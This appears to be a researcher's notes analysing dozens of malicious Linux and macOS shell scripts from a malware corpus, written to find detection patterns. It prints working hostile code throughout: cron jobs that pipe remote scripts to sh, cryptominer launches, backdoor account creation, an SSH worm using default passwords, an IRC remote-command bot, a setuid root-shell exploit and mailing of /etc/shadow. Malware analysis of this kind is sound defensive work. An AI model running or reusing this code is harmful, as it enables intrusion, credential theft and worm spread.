This script stops any firewalls, configures DNS server as 8.8.8.8.
Then, it sets /var/spool/cron/root to execute specific command.
The commands are:
"*/5 * * * * curl -fsSL http://185.244.25.191/i.sh | sh"
*/5 * * * * wget -q -O- http://185.244.25.191/i.sh | sh
Then, it creates and sets /avr/spool/cron/crontabs/root to execute the following commands:
"*/5 * * * * curl -fsSL http://185.244.25.191/i.sh | sh"
"*/5 * * * * wget -q -O- http://185.244.25.191/i.sh | sh"
Finally, it donwloads binary into /urs/local/lib/.zh/, change permission, execute it in background.
-
The downloaded binary file is named as
-
If
/usr/lib/local/.zhdoes not exist, usemkdirto create and usewgetto download. Other wise, usecurlto download.
This looks incomplete. infect variable not defined.
If not infected do the following.
It checks /tmp/vir-* If nothing exists, it executes $0 infect &. So, this looks a part of other script.
During infection, it executes:
tail +25 $0 >>/tmp/vir-$$
chmod 777 /tmp/vir-$$
/tmp/vir-$$ $@
CODE=$?
It prints the first lines into /tmp/vir-$$.
Change permision,
Execute the /tmp/vir-$$ with $@ as prameter.
If infected do the following.
find / -type f -perm +100 -exec bash -c \
"if [ -z \"\`cat {}|grep VIRUS\`\" ]; \
then \
cp {} /tmp/vir-$$; \
(head -24 $0 >{}) 2>/dev/null; \
(cat /tmp/vir-$$ >>{}) 2>/dev/null; \
rm /tmp/vir-$$; \
fi" \;
CODE=0
This find the file name bash from root dir.
The file type should be a file (-type f) and with permision 100.
The -exec option is followed by a command (bash in this case)
Then the bash -c is executed with the following code.
"if [ -z \"\`cat {}|grep VIRUS\`\" ]; \
then \
cp {} /tmp/vir-$$; \
(head -24 $0 >{}) 2>/dev/null; \
(cat /tmp/vir-$$ >>{}) 2>/dev/null; \
rm /tmp/vir-$$; \
fi" \;
{} is replaced by the file name found by find.
So, this code copies the found file to be /tmp/vir-$$.
replace the found file with the first 24 lines of $0.
concat the original content of the found file to the end of the found file.
In summary, this code looks insert a 24-line code at the begining of the found file.
The found file must contain VIRUS at the begining of its file.
This is not an executable shell script. It is for explanation purpose.
IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability Refer : securitytracker.com/id?1022261 This is a vulnerability reporeted in IBM AIX. A local user can obtain root privilleges on the target system
Remove all files under /tmp/httpdlog/*.gz
Remove all .gz and .sh files under current dir.
Check whether process with qwe15884889.01 is running. If it's running, remove everything under /tmp/httpdlog/*.gz and the running program, i.e., $0.
Otherwise, make dir /tmp/httpdlog and collect system information to determine proper binary to download.
typeos=`getconf LONG_BIT`
if [ "$typeos" = "64" ]
then
wget http://119.249.54.100:8846/mall.tar.gz -O my.tar.gz
fi
tar zxvf my.tar.gz
chmod 777 ./mstbcn
chmod 777 ./mstrie
chmod 777 ./mstxcn
rm -f /tmp/httpdlog/*.gz
rm -f *.gz
nohup ./mstbcn -a cryptonight -o bcn -u qwe15884889.01 -p x -B >/dev/null 2>&1 &
nohup ./mstrie -m -o ric -u qwe15884889.02 -p x >/dev/null 2>&1 &
nohup ./mstxcn -a m7 -o bcn -u qwe15884889.01 -p x >/dev/null 2>&1 &
echo "ok"
rm -f $0
fi
This code checkes if the system is 64-bit or not. It does the following.
- Use wget to download.
- untar
- change permission
- clear current dir.
- execute with
nohupon background. - remove this script.
getconfis a command that prints system variables.- Substitutution is often used to collect system info.
- Logs are removed.
- Script can self-remove.
This is a macOS script.
- path
/Library/Internet Plug-Insis a Mac OS path. scutilis default installed on Mac OS but not on Linux./Network/Gloabl/IPv4is a Mac OS path.
It modify the /etc/passwd and /etc/shadow file to add a guest. So that the attacker can use the credentials of that user to login later on.
USER='guests:x:2012:2012::/usr/dt:/bin/sh'
MAIL='magnet@tv2mail.hu'
STRN='guests:$1$TKNjHFAo$usoR2ZazE57AWkaWf8Cpl0:11107:7:91:28:::'
WORD='753951741'
./xgcc;mkdir /usr/dt >>/dev/null 2>&1;
touch /usr/dt/dtinfo;
echo $USER >> /etc/passwd;
echo $STRN >> /etc/shadow;
chown guests /usr/dt;
This code use mkdir to make a user home dir.
Then use echo to set pre-defined passwd and shadow to sensitive files.
Then, chown of the created home dir.
Finally, remove temperary files.
Touching /etc/passwd and /ect/shadow directly without using adduser is suspicious.
Set DEBUG variable to /dev/null Direct all info into DEBUG, i.e., /dev/null to achieve stealthy operation.
Stealthy usually relates to /dev/null.
Try to use sudo to run itself.
Itself usually relates to $0 directly or indirectly.
There is an encoded attempt.
cat > $TMP1 << EOFMARKER
H4sICH7bDFkAA21pbmVyZADE/Q98VNd95w/fGY2kkTS2BxsntKFhBAIEKImISavukmSwSUoakgwY
...
vrltnl4VS5l69a2mZ8kQT0zT0lr6l8lnL6v8Wz3Ld0ar/qHU+/KHev8L7B5+AawYDAA=
EOFMARKER
In this code, the <<SOME-WORD is used as here document. Here document is a kind of string that is used by bash (and other program languages) to make a long stream as a single word.
Quote from Shell Here Document Overview :
Here documents (also called here docs) allow a type of input redirection from some following text. This is often used to embed a short document (such as help text) within a shell script. Using a here doc is often easier and simpler than a series of echo or printf statements. It can also be used to create shell archives (shar files), embed an FTP (or other) script that needs to be fed to some command (such as ftp), and a few other uses. Here docs are so useful many other languages use them, such as Perl and Windows PowerShell.
TMP2="/tmp/minerd"
base64 -d $TMP1 | gunzip -c > $TMP2
rm -rf $TMP1
chmod +x $TMP
This code decodes and decompresses the file. It also removes old file and change permission.
killall bins.sh
killall minerd
killall node
killall nodejs
killall ktx-armv4l
killall ktx-i586
killall ktx-m68k
killall ktx-mips
killall ktx-mipsel
killall ktx-powerpc
killall ktx-sh4
killall ktx-sparc
killall arm5
killall zmap
This code kills many proceses. This is also suspecious especially it kills some important services (e.g., ssh, sshd, iptables).
nohup $TMP2 -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 45hgMAs1sNdMs7H9aCQm8oMCG5HGg37nv9Ab5r8u4R9gcWkSteobyt6faTuV8tnzhSUH3WFmStG1YXtsvSkSo5sz2ugxSW4 >> $DEBUG &
sleep 3
rm -rf $TMP2
This code executes binary.
echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts
rm -rf /root/.bashrc
rm -rf /home/pi/.bashrc
usermod -p \$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1 pi
for pid in `netstat -pant | grep -v "ssh" | grep -v "minerd" | grep ESTABLISHED | awk -F ' ' '{print $7}' | awk -F '/' '{print $1}'`
do
echo $pid
kill -9 $pid
done
This code modifies the known hosts.
It removes important files /root/.bashrc and /home/pi/.bashrc
It modifies user account usermod.
It kills all established network services except ssh and minere. This is agressive.
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 50000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 5
done
This code first use zmap to do port scan.
Then it kills ssh and scp, which means the attacker is going to leave the script running alone.
Use sshpass to login to a server without password prompt. It uses raspberry as its password to login.
The very long line states:
use
scpto upload $MYSELF to a target (scanned) device under/tmp/. Then usesshto connect to that device and executecd /tmp && chmod +x $NAME && bash -c ./$NAME &
This is a self propergation because $NAME and $MYSELF is included, which depends on the program name of this shell.
1. Data dependency is necessary. /dev/null and $0 are highly suspicious.
2. realpath prints the resolved path. E.g., realpath $0
3. nohup is used to start complex tasks remotely.
4. /dev/null is used to avoid output. That is, make it silent.
5. In some cases the here document is cuspicious. Especially combined with a redirect opertion (>), which means the stream is written into a file.
6. Decode is also suspecious, especially together with here document
7. Agressive removal or killing is another indicator.
8. Self-propagation is a strong evidence about the infection. This can be detected by data dependency. If a ssh, scp is observed to pass itself to another device, this is self-propagation.
It's straight forward. Use wget to download many binaries. chmod to change permission, and ./ to execute, finally, rm -rf * to remove all.
This infection may not so effective. It does not check folders and my other infos.
This is not a complete shell.
It's a Vulnerability discovered by : Claudio Viviani.
This script only removes ./output.txt, ./svcname.txt, ./output2.txt, ./datapool.bk and kill datapool.sh.
It also kills ALL programs under ./bin/*
rm -f ./output.txt ; rm -f ./svcname.txt ; rm -f ./output2.txt ; rm -f ./datapool.bk ; killall -9 -w datapool.sh 1>/dev/null 2>&1 ; for KILLER in ./bin/* ; do killall -9 -w $KILLER 1>/dev/null 2>&1 ; done ; exit $@
proc defined but not used.
Use nproc to check number of processing units available.
Use uname -m to print HW architecture.
According to the type of architeture, it executes different binaries.
According to names cryptonight, it should be a minerd malware, which is used for cryptocurrency mining.
Kill all processes you can kill by using kill -9 -1. Then go to \tmp and remove everything rm -rf * and rf -rf .a. This is aggressive.
Then make a dir, download, change permission, execute (at background). Then download, execute, download, execute, download, execute, download.
Then remove everthing under /tmp/su*, which is agreesive.
Finally change permission and execute the last downloaded binary.
export PATH="."is used. This may not be a good practice for software installation because it cannot preserve after logout.- Aggressive kill.
- Agressive remove.
- Match the DW-CH-EXE pattern.
Go to /tmp, download, execute, remove, download, change permission, execute, remove, download, change permission, execute, remove, ... download, change permission, execute, remove.
- This matches the DW-CH-EXE-RM pattern.
- It tries may differnt architectures. But only one is expected to be successfull. So there should be many errors (even crash). Capturing whether the program exits correctly is also an indicator for infection.
This is the "boring" pattern. But it begins with ( at each line, so that this code is not identified as "boring". But natrually, they are the same.
It looks like this is a script that exploits the buffer overflow vulnerability of a FTP server.
Print a "hard-coded" piece of code using echo and perl. Then read from the standard input using cat -.
Finally, pipe this to a nc 0 21 command, which meas connect to a local FTP server.
The hard-coded code is in hex format.
This script seems under development. Because some commands are commented out.
It downloads the named Mirai binaries from a URL.
It also matches the DW-CH-EXE-RM pattern.
This looks like a modified version of other scripts. Because it comments out some commands and add something.
Set the PATH and SHELL variable, but does not export them to make them effective.
Identify whether the caller of this script is a root. If it's a root user, it will set the cron.
echo "*/5 * * * * curl -fsSL http://e3sas6tzvehwgpak.tk/r88.sh|sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://e3sas6tzvehwgpak.tk/r88.sh|sh" > /var/spool/cron/crontabs/root
After that, it downloads using curl, change permission, execute.
If the previous does not run successfully, it download using wget, change permission, and execute.
Not a well written script. E.g., the if is duplicated.
This script looks a little bit innocent because it does not have DW-CH-EXE-RM chain.
Get current place using pwd.
echo a hard-coded data and redirect it to data.file.
cat the data.file and use that output as the parmater of curl -d to a URL.
Finally, it exeuctes two scripts ./sparky.sh 192.168 and ./rand > /dev/null &.
It removes the data.file.
- hard-coded stuff is usually suspecious. Because benign users don't use that, they have more convenience to read from a file, or execute specific client program. In addition, normal users don't want to expose sensitive info in the command line history.
This script is called ## cdrdaohack.sh by Jens "atomi" Steube
cdrdao is a project: Disk-At-Once Recording of Audio and Data CD-Rs/CD-RWs
It looks like a demo.
- It set some paths,
/etc/cron.d/cdr,/usr/bin/cdrdao, and$HOME/.cdrdao. - Then it test the path of
cdrdao. - Then it uses
catto write a hard-coded code of C into a file/tmp/dash.c. - It uses
catto write a hard-coded code of shell into a file/tmp/dao.sh. - It Change permission.
- Backup original file (this is not suspicious)
- make symlink using
ln -s. - Execute
cdrdao, which is a normal program. - Wait
/tmp/daoshto set-user-id is set. - execute
/tmp/daosh.
The /tmp/daosh is as follows.
cc -o /tmp/daosh /tmp/daosh.c >/dev/null 2>&1
chown root /tmp/daosh >/dev/null 2>&1
chgrp root /tmp/daosh >/dev/null 2>&1
chmod 6755 /tmp/daosh >/dev/null 2>&1
exit 0
It compiles /tmp/daosh.c and changes the permission.
The source code of /tmp/dash.c is as follows.
int main () {
setuid(0); setgid(0);
unlink("/tmp/dao.sh");
unlink("/tmp/daosh.c");
unlink("/etc/cron.d/cdr");
unlink("$HOME/.cdrdao");
execl("/bin/bash","bash","-i",0);
}
This code set uid to root. The unlink systemcall deletes a file name from the file system (removing evidence?).
The execl system call replace the current process image with a specified image (/bin/bash in this case).
bash -i 0 means run bash in interactive mode and using the standard input as the input.
- This looks like a demonstration of the vulnerability of
cdrdao. It seems thecdrdaocan make the shell to be executed in root. - It does not match DW-CH-EXE-RM pattern completely. What it looks like is change permission and execute a C program.
This is a "boring" pattern.
This matches the FP-DW-CH-EXE pattern.
This is a "boring" pattern.
This matches the FP-DW-CH-EXE pattern.
This is very similar to
VirusShare_9e04aad6d98f86a9cbe28bbf556da91e.sh
The following just lists some difference between to scripts.
If the user is not root, this script copy itself to /op/ and rewrite /etc/rc.local to execute itself and reboot immediately.
More info about /ect/rc.local in respberrypi could be found here:
https://www.raspberrypi.org/documentation/linux/usage/rc-local.md
After that, some descriminations include:
- Creates a
/root/.ssh - Writes a public key to the
/root/.ssh/authorized_keys - Writes a public key to
/tem/public.perm. - Sets DNS server to
8.8.8.8 - Remove some files under
/tmp/and/var/, but not aggressive. - An encoded bash is written to
/tmp/$BOT. - change permission to
/tmp/$BOT - execute
/tmp/$BOT - remove log file (nohup.log) and output file (nohup.out)
- remove
/tmp/$BOT. - run
zmap, killsshandscp. - use sshpass to login to another device and propagate itsself.
- delete extra files.
I list the common parts here.
- Get the name of current program.
- Redirect outputs to
/dev/null - kill all other malware
- Use
sshpassto propagate through infinit loop. - kill every
sshandscpduring propagate - matches CH-EXE-RM. Note,
change permission, exe, and rm are usually not used in the update process. This is because, updates don't execute immediately or remove downloaded files.
- Hard-coded code is a strong evidence showing that this is an infection.
This is the code of /tmp/$BOT
#!/bin/bash
SYS=`uname -a | md5sum | awk -F' ' '{print $1}'`
NICK=a${SYS:24}
while [ true ]; do
arr[0]="ix1.undernet.org"
arr[1]="ix2.undernet.org"
arr[2]="Ashburn.Va.Us.UnderNet.org"
arr[3]="Bucharest.RO.EU.Undernet.Org"
arr[4]="Budapest.HU.EU.UnderNet.org"
arr[5]="Chicago.IL.US.Undernet.org"
rand=$[$RANDOM % 6]
svr=${arr[$rand]}
eval 'exec 3<>/dev/tcp/$svr/6667;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
echo $NICK
eval 'printf "NICK $NICK\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
eval 'printf "USER user 8 * :IRC hi\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
continue
fi
# Main loop
while [ true ]; do
eval "read msg_in <&3;"
if [[ ! "$?" -eq 0 ]] ; then
break
fi
if [[ "$msg_in" =~ "PING" ]] ; then
printf "PONG %s\n" "${msg_in:5}";
eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
sleep 1
eval 'printf "JOIN #biret\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then
privmsg_h=$(echo $msg_in| cut -d':' -f 3)
privmsg_data=$(echo $msg_in| cut -d':' -f 4)
privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1)
hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'`
sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin`
if [[ "$sign" == "$hash" ]] ; then
CMD=`echo $privmsg_data | base64 -d -i`
RES=`bash -c "$CMD" | base64 -w 0`
eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;'
if [[ ! "$?" -eq 0 ]] ; then
break
fi
fi
fi
done
done
EOFMARKER
This code first get the MD5 check sum of the uname -a output.
Then set NICK as a plus the last 8 character of the md5.
The it gets in an infinite loop.The loop:
- choose a host randomly
3<>/dev/tcp/$svr/6667opens a file (/dev/tcp/$svr/6667in this case) on the file descriptor (3in this case) in read-write mode.execwill execute a file (relates to/dev/tcp/$svr/6667in this case)- print
$NICK, and some other info. Then go into main loop - It reads from
/dev/tcp/$svr/6667 - This main loop looks like a server, receiving message from and send to
/dev/tcp/$svr/6667. - This server tries to verify the openssl key to ensure its integrity.
- If it matches, it decodes the message to get a command. Then use
bash -cto execute that command, whose output is sent tobase64 -w 0. - The decoded content is printed out to the remote side through
/dev/tcp/$svr/6667
According to the comment, this is a SSH22 Scanner By YupY-BoG & GodZilla TEAM !
This script runs an unknown program ./pscan2 and ./ssh-scan 100.
It removes the file it generates completely.
- Define a bard-coded C file that copies the current file to the
/bin/bash. - Compile the file.
- Save the old environment variable
RSHSAVE=$RSH - Use the
./cpbinbashas the environment. I guess this is to trigger an exploit ofcdrecordprogram. The comments of this script also indicates this. - Run
cdrecrod. - Retrive the environment variable
RSH=$RSHSAVE, and remove internal files. - Execute local
./bash, which is copied from/bin/bashby./cpbinbash. Because thecdrecordhas root privilege, so the copied./bashhas that privilege and also withsetuidbit set. So the normal user can use this bash as a root.
- hard-coded file is suspicious
- remove after execution is very suspicious.
- The cdrecord is reported to have vulnerabilities:
CVE-2005-0866, CVE-2004-0806, CVE-2003-0289.
- New command (program) cdrecord. If a vulnerable command is executed then it has chance to be an infection. Usually for preparing the environment.
This is the boring pattern.
- CD to
/tmp - Try both
wgeandcurlwith the same URLs to download binaries. - Change permission
- Execute
- sleep
- Agressively remove everthing under
/tmp/. This also removes the executables after executing them.
This script does not look like for infection purpose. It looks like for damage purpose.
- List all files under current dir.
- copy current script to (possibly overwrite)
._startup,._localfile and chenge permission for them. - It also copies itself to many places under
$HOMEand some other places. - It removes
*.doc,*.xls,*.pdf,*.dbf,*.mdb,*.sql. This looks like removing all data. - Download a file.
- Run
kdialog, a program for GUI. - exeute
wall, a program that sends message to every other users. - exeute
lp, a program to send files to printers to print.
- This looks like copying this file to a place where the script will be executed automatically during startup. Note that, we can use data dependency to check whether this file has copy itself or not.
- New command
wall - New command
lp
This is a script for Mac OS. Because the path is /Library
- It includes hard-coded script.
- Go to
/var/tmpand download, change permission, execute. Delete the string of "bins" in the/etc/hoststo avoid tracking. - Get current file name.
- Use a hard-coded file.
- Decode (
base64) and unzip (gunzip) the file - remove temp file
- change permission
- kill similar process (
minerd) - Execute and remove the executable immediately.
- create a new account
- remove aggressively all the processes.
- launch port scan
zamp. - use
sshpassto self-propagate.
- Execute the file at the background and remove it immediately after execution is super suspicious.
- Port scanning is suspicious. DW-CH-EXE-RM-Scanning is even more suspicious.
- check whether
sofftahas been installed. - If installed, write a shell code in-place, change permission, and schedule it in crontab
- If not installed, copy current script to
/tmp/soffta, change permission, execute it.
- In-place code writing is an indicator of infeciton.
- There is a self-propagate.
- This code may execute multiple times. It is possible to infer that this program try to access a file, and then try to write to it in the next execution.
- Remove a the
/usr/lib/libfl.soif it exists. Then email the connent of the removed file to an email address. - If
/usr/sbin/apmdis not there, copy/usr/lib/.egcs/apmdto/usr/sbin/apmd. Remove/ect/rc.d/rc3.d/S16apmd. Make a symlink for/ect/rc.d/rc3.d/S16amppointing to/usr/sbin/apmd. - Execute
/usr/sbin/apmd
- There is a piece of commented out code. Those code download a file, unzip it, execute
./go. I guess the./gofile is this script.
2. There are multiple ways to execute a file.
1). ./ to execute
2). add it to cron
3). copy it to /ect/rc.d
4). make a symlink and execute the symlink
- New command
apmdfor advanced power management daemon
This script look like an innocent script.
- Lookup DNS for "chaos" with TXT records.
- Execute
./bindor./x496according to the response of the DNS record. - remove temp file.
- New command
digfor DNS lookup. - If not because of "vuln" (I guess short for vulnerability), I cannot say this is a malicious script.
This script is obscure.
- Some parameters are set.
- Use
curlto donwload a file. - Read and check the file.
- execute a binary (not a downloaded one)
./haiducusing the donwloaded file and some other pre-defined variables as arguments. - Download a php file.
- Use
pkillandkillallto kill the just executed binary. This does not look like infection since infection does not kill itself. - download using
curland executephp. - Use
pkillandkillallto killhaiducagian. - remove temp files.
It's hard to say this file is malicious.
- The
./haicudporgram is similar tossh. - The
phpis executed may be because of its vulnerability. However, we cannot see any further exploitation, such as copying file, launching bash. So, this may not exploitphp's vulnerability.
This is just a single line of the "boring" pattern. FP-DW-CH-EXE
This looks like a innocent script because it has its copyright on 2014.
This script uses dirname and basename under itself. Then it runs a gdb-style tool.
This script may be copied or modified from other scripts.
- Set variables and pats.
- Check whether the caller is
rootor not. - If it's not
root, Download usingcurla file to/tmp/lower.sh, change permission, execute it on background. Then if download fails, it usewgetto downlaod/tmp/lowerv2.sh, change permission, execute it on background. - Otherwise, it set a donwload command (
curl) in the/var/spool/cron/root, and/var/spool/cron/crontabs/root. Download usingcurla file to/tmp/root.sh, change permission, execute it on bg. Then if download fails, it useswgetto download/tmp/rootv2.sh, change permission and execute it on bg.
- This script does not remove downloaded file after execution.
This is the fourth time I observe this (similar) file.
VirusShare_9e04aad6d98f86a9cbe28bbf556da91e.sh
and some other.
- find the path of itself.
- redirect the output to
/dev/nullto avoid printing. - Check whether the caller is
root. - If it's not
root, copy itself to/etc/rc.localand reboot. - If it's
rootThen do the following. - Kill a list of processes (not agressive)
- remove
/root/.bashrcand/home/pi/.bashrc, then useusermodto create a new accountpi. - Prepare public key.
- Use hard-coded file. (very sucpicious)
- Another piece of hard-coded file (named $BOT).
- Write the code to a file, change permission, execute the code, remove the file ($BOT)
- run port scan,
- run killall
sshandscp - self-propagate.
#!/bin/bash
#
# March 27 2002
#
# logwatch211.sh
#
# Proof of concept exploit code
# for LogWatch 2.1.1
# Waits for LogWatch to be run then gives root shell
# For educational purposes only
#
# (c) Spybreak <spybreak@host.sk>
- Get pids, execute
/tmp/logwatch.$2/cron. - Modify
/etc/passwd. - Modify
/etc/shadow. - Switch to the newly added user(
master)
This script looks totally OK. It looks like this script is installing some program and run the program. I cannot see any infection-specific operations. That is, it does not download, not remove, not propagate.
This seems to be for Mac OS.
- Change ownership recursively on
/Library/InputManagers/CTLoader - change exe permission for
/Library/InputManagers/CTLoader/
This may cause a false negative to our method.
This scrip looks like only checking the OS version and then execute binary accordingly.
- If OS unknown, execute
./bscan - If OS is RehHat 7.0, execute
./lpd.
- According to the
echocontent, I can see "buffer overflow" ./fp,./bscan, and./lpdare three binaries that execute, but I cannot know what are they.- This indicate that our work may have limitation. Because we only check the Linux commands. For those do not rely on Linux command to infect, we cannot distinguish easily.
This is an infection script that avoids meeting the minimum infection pattern. So this could cause false negative to our method.
- A for loop that downloads a list of binaries, change permission, execute.
- If its not because of the name, It's a little bit unconfident for me to tell this is an infection script.
- Only match the pattern: DW-CH-EXE. Obviously, this should not be enough evidence to claim an infection. However, this has more chance for the execution to be failed. And it leaves the downloaded binaries, which make the infection to be easily tracked.
A typical "boring" pattern.
It matches FP-DW-CH-EXE
This script looks totally fine. I doubt how this script is labeled as "virus" by virus total.
It runs the following commands to collect the network status and write those status to a file /tmp/info, and email this file to a host.
/sbin/ifconfig > /tmp/info
echo '==='>>/tmp/info
hostname -f >> /tmp/info
echo '==='>>/tmp/info
cat /etc/passwd >>/tmp/info
echo '==='>>/tmp/info
cat /etc/shadow >>/tmp/info
echo '==='>>/tmp/info
ping -c 5 www.yahoo.com >>/tmp/info
echo '==='>>/tmp/info
echo 'Port si parola de ssh'>>/tmp/info
echo '$1:$2:' >>/tmp/info
echo '==='>>/tmp/info
socklist >>/tmp/info >/dev/null 2>&1
echo '==='>>/tmp/info
cat /tmp/info | mail puidedrac@gmail.com -s 'invitation'
This code can present in any administrative script.
I cannot see any suspicious for this script. It can be employed by an administrator of the system to collect any network information and email this information to an email. So, it raises an important question: how can we ensure that our dataset is 100% accurate. Because our knowledge is based on this dataset, unlike those using this dataset for evaluate purpose, if this dataset has any "inaccuracy", we have no way to reach an "accurate" conclusion.
Almost the same as
VirusShare_cfd699501ba0834cd88a1c79fd038fb1.sh
For education purpose.
The only difference between this script and
VirusShare_cfd699501ba0834cd88a1c79fd038fb1.sh
is that this script does not write anything to /etc/shadow.
This file is totally fine if we change the name of variables of this script.
mistabel
The original code of this script.
users=$1;
pass=$2;
if [ ! -f "$users" -o ! -f "$pass" ] ; then
echo "File not found";
exit;
fi
rm -f pass_file
for m_user in $(cat $users) ; do
for m_pass in $(cat $pass) ; do
echo "$m_user $m_pass" >>pass_file
done
doneIf we change the name of the variables
book1=$1;
book2=$2;
if [ ! -f "$book1" -o ! -f "$book2" ] ; then
echo "File not found";
exit;
fi
rm -f two_books
for book1_chapter in $(cat $book1) ; do
for book2_chapter in $(cat $book2) ; do
echo "$book1_chapter $book2_chapter" >>two_books
done
doneThis script is totally fine if we change the name of the variables.
- Stops
iptables - Stops
SuSEfirewall2 - Stops
reSuSEfirewall2 - Removes some files, including itself (
$0). - Check the existence of a specific process:
45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z. - If this process exists, kill a list of processes, remove a list of other files (including remove itself multiple times).
rm -f /tmp/.httpdlog*.gz
rm -f *.gz
rm -f *.sh
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0
rm -f $0- If that process does not exist, do the following.
- create a dir at
/tmp/.httpdlog - go to the new dir
- download
- decompress (or unzip, untar, etc.)
- change permission
- remove the downloaded zip file
- execute the excutables
- remove itself
This script does not remove the executables!! So it's another exception.
This is very similar to
VirusShare_15643b394919f1dd4f7cc55aa1c48a9f.sh
The only difference is this scrip "echo" more texts.
This script may be a direct copy and slight modification of the previous script.
This is a classical infection script.
- download using
wget - change permission
- execute
./bash. - download using
wget - change permission
- execute
./arts
./bashis a bit weird.
This is sort of "boring" pattern.
- Find place
cd /tmp - download
- change permission
- execute
- remove
- repeat DW-CH-EXE-RM multiple times.
Classical DW-CH-EXE-RM pattern.
This is the "boring" pattern.
- modify system resource variable
- copy executeable file
/bin/busybox - FP-DW-CP-CH-EXE
- It is not clear whether this file has been truncated or not.
The last command is
caIt can be the programca, or the truncated programcat.
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ntpd -g 107.178.98.206;cat ntpd >badbox;chmod +x *;./badbox
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r sshd -g 107.178.98.206;cat sshd >badbox;chmod +x *;./badbox
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r openssh -g 107.178.98.206;cat openssh >badbox;chmod +x *;./badbox
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r bash -g 107.178.98.206;ca